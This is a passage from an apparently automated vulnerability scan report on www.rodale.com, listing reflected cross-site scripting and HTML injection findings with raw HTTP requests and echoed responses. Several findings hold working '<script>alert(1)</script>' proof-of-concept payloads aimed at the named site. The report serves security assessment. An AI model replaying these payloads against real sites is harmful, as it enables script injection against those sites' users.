Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=2vjhlkk1529r9plm9lb9mg65r3; path=/; domain=.rodale.com
Content-Length: 39517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/heart-attack-triggers?dbb25"><script>alert(1)</script>564e60a91c5=1&title=6+Surprising+Heart+Attack+Triggers%E2%80%94And+How+to+Avoid+Them">
...[SNIP]...

2.174. http://www.rodale.com/how-prevent-hangover [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /how-prevent-hangover

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2ab9"><a>0521f4e25fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /how-prevent-hangoverc2ab9"><a>0521f4e25fc HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:52 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:53 GMT
Date: Thu, 10 Mar 2011 17:05:53 GMT
Content-Length: 22476
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page how-prevent-hangoverc2ab9"><a>0521f4e25fc node node-958">
...[SNIP]...

2.175. http://www.rodale.com/how-prevent-hangover [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /how-prevent-hangover

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8ca8"><script>alert(1)</script>0882a534b52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /how-prevent-hangover?d8ca8"><script>alert(1)</script>0882a534b52=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:50 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:51 GMT
Date: Thu, 10 Mar 2011 17:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=fj874quhv9dnimnruns1adqp45; path=/; domain=.rodale.com
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/how-prevent-hangover?d8ca8"><script>alert(1)</script>0882a534b52=1&title=Eat+Asparagus+to+Prevent+a+Hangover">
...[SNIP]...

2.176. http://www.rodale.com/lean-belly-prescription-0 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /lean-belly-prescription-0

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24eff"><a>b3586aad4d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lean-belly-prescription-024eff"><a>b3586aad4d0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:13 GMT
Date: Thu, 10 Mar 2011 17:06:13 GMT
Content-Length: 22491
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page lean-belly-prescription-024eff"><a>b3586aad4d0 node node-958">
...[SNIP]...

2.177. http://www.rodale.com/lean-belly-prescription-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /lean-belly-prescription-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2edf2"><a>6a2ca148eca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /lean-belly-prescription-0?2edf2"><a>6a2ca148eca=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 403 Forbidden
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:32 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:33 GMT
Date: Thu, 10 Mar 2011 17:05:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=o09niatdh18rp05j6e72i1cop6; path=/; domain=.rodale.com
Content-Length: 24254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/lean-belly-prescription-0?2edf2"><a>6a2ca148eca=1" title="Register" class="moreLink">
...[SNIP]...

2.178. http://www.rodale.com/living [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /living

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a96ab"><a>6b2cdfc6782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livinga96ab"><a>6b2cdfc6782 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:42 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:44 GMT
Date: Thu, 10 Mar 2011 17:06:44 GMT
Content-Length: 22434
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page livinga96ab"><a>6b2cdfc6782 node node-958">
...[SNIP]...

2.179. http://www.rodale.com/living [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /living

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d84c"><a>59b0f950f6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /living?6d84c"><a>59b0f950f6b=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Thu, 10 Mar 2011 18:05:20 GMT
Date: Thu, 10 Mar 2011 17:05:20 GMT
Content-Length: 27151
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class="">

<head>

...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/living?6d84c"><a>59b0f950f6b=1" title="Register" class="moreLink">
...[SNIP]...

2.180. http://www.rodale.com/natural-sleep-remedies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /natural-sleep-remedies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db32a"><a>a3f39864366 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /natural-sleep-remediesdb32a"><a>a3f39864366 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:37 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:38 GMT
Date: Thu, 10 Mar 2011 17:05:38 GMT
Content-Length: 22482
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page natural-sleep-remediesdb32a"><a>a3f39864366 node node-958">
...[SNIP]...

2.181. http://www.rodale.com/natural-sleep-remedies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /natural-sleep-remedies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7af78"><script>alert(1)</script>0ece62a6df9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /natural-sleep-remedies?7af78"><script>alert(1)</script>0ece62a6df9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:35 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:05:36 GMT
Date: Thu, 10 Mar 2011 17:05:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=of5a857ajiill0f4bp1taa79m4; path=/; domain=.rodale.com
Content-Length: 42864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/natural-sleep-remedies?7af78"><script>alert(1)</script>0ece62a6df9=1&title=Get+a+Good+Night%E2%80%99s+Sleep+with+Skills%2C+Not+Pills">
...[SNIP]...

2.182. http://www.rodale.com/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /news

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1836f"><a>caf7a9d9ed0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news1836f"><a>caf7a9d9ed0 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:02 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:04 GMT
Date: Thu, 10 Mar 2011 17:06:04 GMT
Content-Length: 22432
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page news1836f"><a>caf7a9d9ed0 node node-958">
...[SNIP]...

2.183. http://www.rodale.com/news [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7057e"><a>dd1d23aebcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news?7057e"><a>dd1d23aebcc=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:05:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:35:07 GMT
Date: Thu, 10 Mar 2011 17:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/news?7057e"><a>dd1d23aebcc=1" title="Register" class="moreLink">
...[SNIP]...

2.184. http://www.rodale.com/our-board-advisors [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-board-advisors

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba43c"><a>691650629db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-board-advisorsba43c"><a>691650629db HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:45 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:47 GMT
Date: Thu, 10 Mar 2011 17:07:47 GMT
Content-Length: 22470
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page our-board-advisorsba43c"><a>691650629db node node-958">
...[SNIP]...

2.185. http://www.rodale.com/our-board-advisors [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-board-advisors

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ff3"><a>41e683e2082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-board-advisors?d4ff3"><a>41e683e2082=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:53 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:55 GMT
Date: Thu, 10 Mar 2011 17:06:55 GMT
Content-Length: 29887
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/our-board-advisors?d4ff3"><a>41e683e2082=1" title="Register" class="moreLink">
...[SNIP]...

2.186. http://www.rodale.com/our-site-policies [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-site-policies

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e96"><a>b046c7db16b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-site-policies10e96"><a>b046c7db16b HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:38:01 GMT
Date: Thu, 10 Mar 2011 17:08:02 GMT
Content-Length: 22467
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page our-site-policies10e96"><a>b046c7db16b node node-958">
...[SNIP]...

2.187. http://www.rodale.com/our-site-policies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /our-site-policies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643a2"><a>a2b3e6c8fee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /our-site-policies?643a2"><a>a2b3e6c8fee=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:07 GMT
Date: Thu, 10 Mar 2011 17:07:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/our-site-policies?643a2"><a>a2b3e6c8fee=1" title="Register" class="moreLink">
...[SNIP]...

2.188. http://www.rodale.com/plastic-bag-ban [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /plastic-bag-ban

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4e09"><a>1960b2b02f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plastic-bag-banc4e09"><a>1960b2b02f8 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:11 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:12 GMT
Date: Thu, 10 Mar 2011 17:06:12 GMT
Content-Length: 22461
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page plastic-bag-banc4e09"><a>1960b2b02f8 node node-958">
...[SNIP]...

2.189. http://www.rodale.com/plastic-bag-ban [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /plastic-bag-ban

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52f3b"><script>alert(1)</script>79010ebe967 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /plastic-bag-ban?52f3b"><script>alert(1)</script>79010ebe967=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:09 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Expires: Thu, 10 Mar 2011 17:06:11 GMT
Date: Thu, 10 Mar 2011 17:06:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SESS173207854f9299da8c63222b0f01afdd=f2kjnuqirscng4v1t45rk1utd5; path=/; domain=.rodale.com
Content-Length: 48864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="http://www.stumbleupon.com/submit?url=http://www.rodale.com/plastic-bag-ban?52f3b"><script>alert(1)</script>79010ebe967=1&title=You+Pay+%2488+a+Year+for+%22Free%22+Plastic+Bags">
...[SNIP]...

2.190. http://www.rodale.com/plastic-free [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /plastic-free

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c182"><a>fa0287626fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /plastic-free7c182"><a>fa0287626fe HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
